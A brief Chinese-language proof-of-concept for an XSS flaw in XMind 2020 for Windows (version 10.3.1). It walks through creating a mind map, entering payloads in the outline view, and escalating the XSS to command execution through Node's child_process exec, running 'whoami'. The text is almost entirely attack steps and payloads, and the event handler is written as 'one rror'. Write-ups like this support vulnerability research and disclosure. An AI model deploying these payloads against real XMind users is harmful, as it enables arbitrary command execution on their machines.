攻击机:Win 10
官网windows最新版本:XMind-2020-for-Windows-64bit-10.3.1-202101070032
(1)安装Xmind后,新建一个思维导图,然后点击大纲:
(2)尝试XSS语句测试payload:(windows版本,选中后点击ctrl即可触发弹框)
<img src=x one rror=alert(1)>
(3)尝试使用xss进行命令执行:
<img src=x one rror="const exec = require('child_process').exec;exec('whoami').stdout.on('data', function (data) {alert(data);})">